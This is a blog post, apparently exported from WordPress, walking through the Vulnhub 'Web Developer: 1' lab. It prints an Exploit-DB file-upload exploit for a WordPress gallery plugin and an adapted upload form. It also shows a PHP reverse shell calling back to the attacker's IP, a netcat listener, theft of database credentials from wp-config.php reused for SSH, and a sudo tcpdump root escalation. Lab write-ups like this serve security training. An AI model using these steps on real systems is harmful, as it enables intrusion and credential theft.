Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# locate php\/webapps\/36374.txt\n\/usr\/share\/exploitdb\/exploits\/php\/webapps\/36374.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# cat \/usr\/share\/exploitdb\/exploits\/php\/webapps\/36374.txt\n# Exploit Title: WordPress Plugin Reflex Gallery - Arbitrary File Upload\n# Google Dork: 
inurl:wp-content\/plugins\/reflex-gallery\/\n# Date: 08.03.2015\n# Exploit Author: CrashBandicot @DosPerl\n# Vendor Homepage: https:\/\/wordpress.org\/plugins\/reflex-gallery\/\n# Software Link: https:\/\/downloads.wordpress.org\/plugin\/reflex-gallery.zip\n# Version: 3.1.3 (Last)\n# Tested on: Windows\n\n# p0C : http:\/\/i.imgur.com\/mj8yADU.png\n\n# Path : wp-content\/plugins\/reflex-gallery\/admin\/scripts\/FileUploader\/php.php\n# add Month and Year in GET for Folder of Shell .\/wp-content\/uploads\/&quot; .$_GET[&#039;Year&#039;].&#039;\/&#039;.$_GET[&#039;Month&#039;]. &quot;\n\nVulnerable File : php.php\n50.      if(!move_uploaded_file($_FILES[&#039;qqfile&#039;][&#039;tmp_name&#039;], $path)){\n173.         $result = $uploader-&gt;handleUpload(&#039;..\/..\/..\/..\/..\/uploads\/&#039;.$_GET[&#039;Year&#039;].&#039;\/&#039;.$_GET[&#039;Month&#039;].&#039;\/&#039;);\n\n# Exploit :\n\n&lt;form method=&quot;POST&quot; action=&quot;http:\/\/127.0.0.1:1337\/wordpress\/wp-content\/plugins\/reflex-gallery\/admin\/scripts\/FileUploader\/php.php?Year=2015&amp;Month=03&quot; enctype=&quot;multipart\/form-data&quot; &gt;\n    &lt;input type=&quot;file&quot; name=&quot;qqfile&quot;&gt;&lt;br&gt;\n    &lt;input type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;Pwn!&quot;&gt;\n&lt;\/form&gt;\n\n# Shell Path : http:\/\/127.0.0.1:1337\/wordpress\/wp-content\/uploads\/2015\/03\/backdoor.php <\/code><\/pre>\n<p>I wrote my HTML code adapted to my environment.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# cat exploit.html                                       \n&lt;html&gt;\n&lt;body&gt;&lt;!--2021\/06\/--&gt;\n&lt;form method=&quot;POST&quot; action=&quot;http:\/\/192.168.31.147\/wp-content\/plugins\/reflex-gallery\/admin\/scripts\/FileUploader\/php.php?Year=2021&amp;Month=06&quot; enctype=&quot;multipart\/form-data&quot; &gt;\n    &lt;input type=&quot;file&quot; name=&quot;qqfile&quot;&gt;&lt;br&gt;\n    &lt;input 
type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;Pwn!&quot;&gt;\n&lt;\/form&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>Then I served it with Python's http.server.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# python3 -m http.server \nServing HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...\n127.0.0.1 - - [22\/Jun\/2021 16:40:48] &quot;GET \/exploit.html HTTP\/1.1&quot; 200 -\n<\/code><\/pre>\n<p>I won't show all of it; I took my PHP reverse shell from pentestmonkey and uploaded it through exploit.html.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/Desktop]\n\u2514\u2500# head -n 50 backdoor.php\n&lt;?php\n\/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n\/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\/\/\n\/\/ This tool may be used for legal purposes only.  Users take full responsibility\n\/\/ for any actions performed using this tool.  The author accepts no liability\n\/\/ for damage caused by this tool.  If these terms are not acceptable to you, then\n\/\/ do not use this tool.\n\/\/\n\/\/ In all other respects the GPL version 2 applies:\n\/\/\n\/\/ This program is free software; you can redistribute it and\/or modify\n\/\/ it under the terms of the GNU General Public License version 2 as\n\/\/ published by the Free Software Foundation.\n\/\/\n\/\/ This program is distributed in the hope that it will be useful,\n\/\/ but WITHOUT ANY WARRANTY; without even the implied warranty of\n\/\/ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n\/\/ GNU General Public License for more details.\n\/\/\n\/\/ You should have received a copy of the GNU General Public License along\n\/\/ with this program; if not, write to the Free Software Foundation, Inc.,\n\/\/ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\/\/\n\/\/ This tool may be used for legal purposes only.  
Users take full responsibility\n\/\/ for any actions performed using this tool.  If these terms are not acceptable to\n\/\/ you, then do not use this tool.\n\/\/\n\/\/ You are encouraged to send comments, improvements or suggestions to\n\/\/ me at pentestmonkey@pentestmonkey.net\n\/\/\n\/\/ Description\n\/\/ -----------\n\/\/ This script will make an outbound TCP connection to a hardcoded IP and port.\n\/\/ The recipient will be given a shell running as the current user (apache normally).\n\/\/\n\/\/ Limitations\n\/\/ -----------\n\/\/ proc_open and stream_set_blocking require PHP version 4.3+, or 5+\n\/\/ Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.\n\/\/ Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.\n\/\/\n\/\/ Usage\n\/\/ -----\n\/\/ See http:\/\/pentestmonkey.net\/tools\/php-reverse-shell if you get stuck.\n\nset_time_limit (0);\n$VERSION = &quot;1.0&quot;;\n$ip = &#039;192.168.31.130&#039;;  \/\/ CHANGE THIS\n$port = 1822;       \/\/ CHANGE THIS\n<\/code><\/pre>\n<p>In response, the web service gave me the following reply.<\/p>\n<pre><code class=\"language-html\">{&quot;success&quot;:true,&quot;fileName&quot;:&quot;\\\/2021\\\/06\\\/backdoor.php&quot;}<\/code><\/pre>\n<p>Great, now let us get the reverse shell. I triggered the address <strong>192.168.31.147\/wp-content\/uploads\/2021\/06\/backdoor.php<\/strong>. 
Beforehand, of course, I had started a listener on port 1822.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nc -lvp 1822                                                                                                                                                                                                                          1 \u2a2f\nlistening on [any] 1822 ...\n192.168.31.147: inverse host lookup failed: Unknown host\nconnect to [192.168.31.130] from (UNKNOWN) [192.168.31.147] 50900\nLinux webdeveloper 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\n 20:47:13 up  2:21,  0 users,  load average: 0.20, 0.18, 0.08\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n<\/code><\/pre>\n<p>Since the target is WordPress, I decided to read the config file.<\/p>\n<pre><code class=\"language-sh\">$ cd \/var\/wwww\n\/bin\/sh: 11: cd: can&#039;t cd to \/var\/wwww\n$ cd \/var\/www\n$ ls\nhtml\n$ cd html\n$ ls\nindex.php\nipdata\nlicense.txt\nreadme.html\nwp-activate.php\nwp-admin\nwp-blog-header.php\nwp-comments-post.php\nwp-config-sample.php\nwp-config.php\nwp-content\nwp-cron.php\nwp-includes\nwp-links-opml.php\nwp-load.php\nwp-login.php\nwp-mail.php\nwp-settings.php\nwp-signup.php\nwp-trackback.php\nxmlrpc.php\n$ cat wp-config.php\n&lt;?php\n\/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the\n * installation. 
You don&#039;t have to use the web site, you can\n * copy this file to &quot;wp-config.php&quot; and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * MySQL settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https:\/\/codex.wordpress.org\/Editing_wp-config.php\n *\n * @package WordPress\n *\/\n\n\/\/ ** MySQL settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine(&#039;DB_NAME&#039;, &#039;wordpress&#039;);\n\n\/** MySQL database username *\/\ndefine(&#039;DB_USER&#039;, &#039;webdeveloper&#039;);\n\n\/** MySQL database password *\/\ndefine(&#039;DB_PASSWORD&#039;, &#039;MasterOfTheUniverse&#039;);\n\n\/** MySQL hostname *\/\ndefine(&#039;DB_HOST&#039;, &#039;localhost&#039;);\n\n\/** Database Charset to use in creating database tables. *\/\ndefine(&#039;DB_CHARSET&#039;, &#039;utf8mb4&#039;);\n\n....<\/code><\/pre>\n<p>With these credentials I was able to log in over SSH.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ssh webdeveloper@192.168.31.147\nwebdeveloper@192.168.31.147&#039;s password: \nWelcome to Ubuntu 18.04.1 LTS (GNU\/Linux 4.15.0-38-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n System information disabled due to load higher than 1.0\n\n * Security certifications for Ubuntu!\n   We now have FIPS, STIG, CC and a CIS Benchmark.\n\n   - http:\/\/bit.ly\/Security_Certification\n\n * Want to make a highly secure kiosk, smart display or touchscreen?\n   Here&#039;s a step-by-step tutorial for a rainy weekend, or a startup.\n\n   - https:\/\/bit.ly\/secure-kiosk\n\n0 packages can be updated.\n0 updates are security updates.\n\nNew release &#039;20.04.2 LTS&#039; available.\nRun &#039;do-release-upgrade&#039; to upgrade to it.\n\nLast login: Tue Jun 22 
20:53:48 2021 from 192.168.31.130\nwebdeveloper@webdeveloper:~$ \n<\/code><\/pre>\n<p>I enumerated the host with the lse.sh enumeration script I always use and found something interesting.<\/p>\n<pre><code class=\"language-sh\">webdeveloper@webdeveloper:~$ sudo -l\n[sudo] password for webdeveloper: \nMatching Defaults entries for webdeveloper on webdeveloper:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser webdeveloper may run the following commands on webdeveloper:\n    (root) \/usr\/sbin\/tcpdump\n<\/code><\/pre>\n<p>Great, now let us get root.<\/p>\n<pre><code class=\"language-sh\">webdeveloper@webdeveloper:\/tmp$ echo $&#039;whoami&#039; &gt; \/tmp\/.test\nwebdeveloper@webdeveloper:\/tmp$ chmod +x \/tmp\/.test\nwebdeveloper@webdeveloper:\/tmp$ sudo tcpdump -ln -i eth0 -w \/dev\/null -W 1 -G 1 -z \/tmp\/.test -Z root\ndropped privs to root\ntcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes\nMaximum file limit reached: 1\n1 packet captured\n12 packets received by filter\n0 packets dropped by kernel\nwebdeveloper@webdeveloper:\/tmp$ root\n<\/code><\/pre>\n<p>And so we executed code with root privileges.<\/p>\n<pre><code class=\"language-sh\">webdeveloper@webdeveloper:\/tmp$ echo $&#039;id\\nusermod -a -G sudo webdeveloper&#039; &gt; \/tmp\/.test\nwebdeveloper@webdeveloper:\/tmp$ chmod +x \/tmp\/.test\nwebdeveloper@webdeveloper:\/tmp$ sudo tcpdump -ln -i eth0 -w \/dev\/null -W 1 -G 1 -z \/tmp\/.test -Z root\n[sudo] password for webdeveloper: \ndropped privs to root\ntcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes\nMaximum file limit reached: 1\n1 packet captured\n12 packets received by filter\n0 packets dropped by kernel<\/code><\/pre>\n<p>Now let us become root.<\/p>\n<pre><code class=\"language-sh\">webdeveloper@webdeveloper:\/tmp$ exit\nlogout\nConnection to 
192.168.31.147 closed.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ssh webdeveloper@192.168.31.147\nwebdeveloper@192.168.31.147&#039;s password: \nWelcome to Ubuntu 18.04.1 LTS (GNU\/Linux 4.15.0-38-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Tue Jun 22 22:20:59 UTC 2021\n\n  System load:  0.0                Processes:           99\n  Usage of \/:   23.3% of 19.56GB   Users logged in:     0\n  Memory usage: 65%                IP address for eth0: 192.168.31.147\n  Swap usage:   0%\n\n * Security certifications for Ubuntu!\n   We now have FIPS, STIG, CC and a CIS Benchmark.\n\n   - http:\/\/bit.ly\/Security_Certification\n\n * Want to make a highly secure kiosk, smart display or touchscreen?\n   Here&#039;s a step-by-step tutorial for a rainy weekend, or a startup.\n\n   - https:\/\/bit.ly\/secure-kiosk\n\n0 packages can be updated.\n0 updates are security updates.\n\nNew release &#039;20.04.2 LTS&#039; available.\nRun &#039;do-release-upgrade&#039; to upgrade to it.\n\nLast login: Tue Jun 22 21:46:26 2021 from 192.168.31.130\nwebdeveloper@webdeveloper:~$ sudo su\n[sudo] password for webdeveloper: \nroot@webdeveloper:\/home\/webdeveloper# cd \/root\nroot@webdeveloper:~# ls\nflag.txt\nroot@webdeveloper:~# cat flag.txt \nCongratulations here is youre flag:\ncba045a5a4f26f1cd8d7be9a5c2b1b34f6c5d290<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Information About the Machine Description: A machine using the newest REMOVED Server, the newest REMOVED and containing some REMOVED&#8230;. 
Vulnhub Page: https:\/\/www.vulnhub.com\/entry\/web-developer-1,288\/ Download Page: https:\/\/download.vulnhub.com\/webdeveloper\/WebDeveloper.ova Walkthrough&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/22\/web-developer-1\/\">Read more<span class=\"screen-reader-text\">WEB DEVELOPER: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[518,206,527],"class_list":["post-1231","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-tcpdump","tag-wordpress","tag-wordpress-pluggin","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1231","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1231"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1231\/revisions"}],"predecessor-version":[{"id":1232,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1231\/revisions\/1232"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1231"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1231"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1231"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templ
ated":true}]}}